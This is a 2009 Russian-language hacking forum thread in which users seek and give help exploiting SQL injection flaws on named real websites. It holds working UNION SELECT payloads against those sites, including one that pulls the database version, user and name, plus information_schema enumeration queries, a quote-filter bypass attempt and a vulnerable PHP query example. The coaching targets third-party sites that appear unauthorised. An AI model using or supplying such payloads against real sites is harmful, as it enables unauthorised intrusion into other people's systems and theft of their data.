Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
04.06.2009, 19:00
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Пункт 4.2 Фильтруется символ/строка, там как раз про hex 
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
29.06.2009, 10:39
|
|
Новичок
Регистрация: 11.06.2008
Сообщений: 29
Провел на форуме:
340480
Репутация:
11
|
|
Здравствуйте, есть сайт с Injection в POST запросе.
При value="1' " выдает
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by `name`' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in shop.php on line 456
видимо кавычки экранируются.
При запросе value="1+1" выдает страницу как при value="2".
Возможно ли расскрутить эту иньекцию в что либо стоящие?
Последний раз редактировалось SeTM; 02.07.2009 в 09:03..
|
|
|
|
01.07.2009, 10:49
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
SeTM, почему нет?
пробуй дальше, всё так же как и при GET, только с POST Запросами...
|
|
|
|
18.10.2009, 16:58
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
тривиальный пример:
Код:
mysql_query('select * from `news` where id =$_GET['id']')
|
|
|
|
25.10.2009, 19:35
|
|
Новичок
Регистрация: 30.09.2009
Сообщений: 2
Провел на форуме:
55307
Репутация:
0
|
|
Ну к примеру сайт http://www.mibf.ru.Захожу в любую новость
http://www.mibf.ru/?id=52&news_id=417
Вместо 417 вставляю 1'
Выходят ошибки SQL(как я понял)
Теперь не пойму...можно ли использовать SQL Injection тут,и что мне дальше делать с этим?
П.С заметил когда в ссылке http://www.mibf.ru/?id=52&news_id=417 вместо ?id=52 вставляю 1' вылезает белое окно с ошибкой,А если на место 417 вставить...будет другой результят.С чем это может быть связанно?
Заранее благодарю
|
|
|
|
03.11.2009, 02:16
|
|
Участник форума
Регистрация: 25.10.2007
Сообщений: 177
Провел на форуме:
551782
Репутация:
58
|
|
Приветствую. К сожалению, в силу своей безграмотности я так и не смог провести ни одной иньекции. Синтаксис sql немного знаю, но по статьям не получается никак.
Как правило, грабли одни и те же. Вот к примеру
Уязвимый скрипт register.cgi
Количество столбцов: 2.
Вот запрос(## убрать):
http://www.s##par##k-com.ru/cgi-bin/register.cgi?region_id=-1+union+select+1,2--
Однако, при подстановке в одно из полей, к примеру, @@basedir или Version вывод остается неизменным. Что я делаю не так? |
|
|
|
03.11.2009, 18:35
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от freelsd
Приветствую. К сожалению, в силу своей безграмотности я так и не смог провести ни одной иньекции. Синтаксис sql немного знаю, но по статьям не получается никак.
Как правило, грабли одни и те же. Вот к примеру
Уязвимый скрипт register.cgi
Количество столбцов: 2.
Вот запрос(## убрать):
Однако, при подстановке в одно из полей, к примеру, @@basedir или Version вывод остается неизменным. Что я делаю не так?
_http://www.spark-com.ru/cgi-bin/register.cgi?region_id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),null--
Последний раз редактировалось .:[melkiy]:.; 03.11.2009 в 18:45..
|
|
|
|
03.11.2009, 11:58
|
|
Постоянный
Регистрация: 31.07.2008
Сообщений: 370
Провел на форуме:
2866942
Репутация:
350
|
|
хм... скорее всего нет полей на вывод
|
|
|
|
23.11.2009, 12:17
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 34
Провел на форуме:
276020
Репутация:
18
|
|
подскажите пожалуйста, что делать, если на запрос
.../?id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+WHERE+TABLE_NAME='author'+LIMIT+1,1+--
выводится mysql_fetch_array(): supplied argument is not a valid MySQL result resource...
похоже, что фильтруется кавычка, но
.../?id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+WHERE+TABLE_NAME=char(27)+author+char(27) +LIMIT+1,1+--
выводит ту же ошибку
|
|
|
|
23.11.2009, 20:06
|
|
Banned
Регистрация: 03.08.2005
Сообщений: 430
Провел на форуме:
639191
Репутация:
60
|
|
Dr Z3r0
можеш на примере показать код пожалуста. и пример php кода для 2 примера.
1)САМОЕ ГЛАВНОЕ ФИЛЬТРОВАТЬ КАВЫЧКИ.
-------------------------------
2)Если используется оператор сравнения строк LIKE фильтровать знаки “%” и “_”
-------------------------------
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
Похожие темы
Комбинированный вид